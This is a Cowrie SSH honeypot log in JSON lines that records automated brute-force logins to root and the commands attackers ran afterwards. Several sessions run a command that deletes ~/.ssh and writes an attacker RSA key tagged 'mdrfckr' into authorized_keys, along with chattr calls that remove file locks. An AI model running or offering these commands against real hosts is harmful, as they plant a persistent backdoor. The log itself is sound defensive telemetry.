{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.751096Z","src_ip":"192.155.90.220","session":"2e998048db1c"}
{"eventid":"cowrie.login.success","username":"root","password":"112233445566778899","message":"login attempt [root/112233445566778899] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:10:35.511868Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:10:36.449116Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:10:36.449874Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:10:36.450798Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:36.693049Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:10:37.203660Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.204495Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52168,"dst_ip":"1.2.3.4","dst_port":22,"session":"583dd6dd36e2","protocol":"ssh","message":"New connection: 212.227.235.229:52168 (1.2.3.4:22) [session: 583dd6dd36e2]","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.206774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.207433Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.450266Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.451252Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.463797Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57218,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9d4ee10d24","protocol":"ssh","message":"New connection: 43.159.36.188:57218 (1.2.3.4:22) [session: cf9d4ee10d24]","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.698639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.699413Z","src_ip":"43.159.36.188","session":"cf9d4ee10d24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:37.947837Z","src_ip":"43.159.36.188","session":"cf9d4ee10d24"}
{"eventid":"cowrie.login.success","username":"root","password":"secretpass","message":"login attempt [root/secretpass] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:10:38.528893Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:38.983838Z","src_ip":"43.159.36.188","session":"cf9d4ee10d24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:10:39.059575Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:10:39.060297Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:10:39.061225Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:39.319237Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:10:39.888184Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:10:39.888970Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.148320Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.149243Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.234540Z","src_ip":"43.159.36.188","session":"cf9d4ee10d24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53258,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d0ae9aa6d81","protocol":"ssh","message":"New connection: 212.227.235.229:53258 (1.2.3.4:22) [session: 5d0ae9aa6d81]","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.403341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.404283Z","src_ip":"212.227.235.229","session":"5d0ae9aa6d81"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57224,"dst_ip":"1.2.3.4","dst_port":22,"session":"76f50e085b3a","protocol":"ssh","message":"New connection: 43.159.36.188:57224 (1.2.3.4:22) [session: 76f50e085b3a]","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.487023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.487743Z","src_ip":"43.159.36.188","session":"76f50e085b3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.661977Z","src_ip":"212.227.235.229","session":"5d0ae9aa6d81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:40.741185Z","src_ip":"43.159.36.188","session":"76f50e085b3a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:41.726248Z","src_ip":"212.227.235.229","session":"5d0ae9aa6d81"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:10:41.796559Z","src_ip":"43.159.36.188","session":"76f50e085b3a"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:42.052517Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:42.053408Z","src_ip":"43.159.36.188","session":"76f50e085b3a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:42.985329Z","src_ip":"212.227.235.229","session":"5d0ae9aa6d81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54216,"dst_ip":"1.2.3.4","dst_port":22,"session":"286a73e575da","protocol":"ssh","message":"New connection: 212.227.235.229:54216 (1.2.3.4:22) [session: 286a73e575da]","sensor":"my-vps","timestamp":"2025-08-31T06:10:43.240625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:43.241823Z","src_ip":"212.227.235.229","session":"286a73e575da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:43.500230Z","src_ip":"212.227.235.229","session":"286a73e575da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:10:44.571497Z","src_ip":"212.227.235.229","session":"286a73e575da"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:44.829443Z","src_ip":"212.227.235.229","session":"583dd6dd36e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:44.830774Z","src_ip":"212.227.235.229","session":"286a73e575da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46810,"dst_ip":"1.2.3.4","dst_port":22,"session":"c185591c43c2","protocol":"ssh","message":"New connection: 212.227.235.229:46810 (1.2.3.4:22) [session: c185591c43c2]","sensor":"my-vps","timestamp":"2025-08-31T06:10:58.721580Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54976,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e417569054","protocol":"ssh","message":"New connection: 212.227.125.160:54976 (1.2.3.4:22) [session: 39e417569054]","sensor":"my-vps","timestamp":"2025-08-31T06:10:59.384091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:59.398415Z","src_ip":"212.227.235.229","session":"c185591c43c2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:10:59.399282Z","src_ip":"212.227.235.229","session":"c185591c43c2"}
{"eventid":"cowrie.login.failed","username":"test4","password":"12345678","message":"login attempt [test4/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:05.409837Z","src_ip":"212.227.235.229","session":"c185591c43c2"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:07.104156Z","src_ip":"212.227.235.229","session":"c185591c43c2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:11:07.973956Z","src_ip":"212.227.125.160","session":"39e417569054"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:11:07.974941Z","src_ip":"212.227.125.160","session":"39e417569054"}
